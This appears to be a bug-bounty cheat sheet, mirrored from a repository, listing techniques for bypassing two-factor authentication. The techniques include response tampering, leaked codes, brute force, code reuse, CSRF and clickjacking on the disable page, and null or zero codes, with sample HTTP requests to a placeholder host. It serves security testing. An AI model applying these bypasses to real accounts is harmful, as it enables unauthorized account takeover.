Projects STRLCPY AllAboutBugBounty Files
🤬
a2c07348
ROOT /
Bypass /
Bypass 2FA.md
95 lines | ISO-8859-1 | 1 KB

Bypass Two-Factor Authentication

  1. Response manipulation

The response is

HTTP/1.1 404 Not Found
...
{"code": false}

Try this to bypass

HTTP/1.1 404 Not Found
...
{"code": true}
  1. Status code manipulation

The response is

HTTP/1.1 404 Not Found
...
{"code": false}

Try this to bypass

HTTP/1.1 200 OK
...
{"code": false}
  1. 2FA Code in Response

Always check the response!

POST /req-2fa/
Host: vuln.com
...
[email protected]

The response is

HTTP/1.1 200 OK
...
{"email": "[email protected]", "code": "101010"}
  1. JS Files may contain info about the 2FA Code (Rare case)

  2. Bruteforce the 2FA code

  3. Missing 2FA Code integrity validation, code for any user account can be used

POST /2fa/
Host: vuln.com
...
[email protected]&code=382923
POST /2fa/
Host: vuln.com
...
[email protected]&code=382923
  1. No CSRF protection on disabling 2FA, also there is no auth confirmation.

  2. 2FA gets disabled on password change/email change.

  3. Clickjacking on 2FA disabling page, by iframing the 2FA Disabling page and lure the victim to disable the 2FA.

  4. Enabling 2FA doesn't expire previously active sessions, if the session is already hijacked and there is a session timeout vuln.

  5. 2FA code reusability, same code can be reused.

  6. Enter code 000000

POST /2fa/
Host: vuln.com
...
code=00000
  1. Enter code "null"
POST /2fa/
Host: vuln.com
...
code=null

References

Please wait...
Page is in error, reload to recover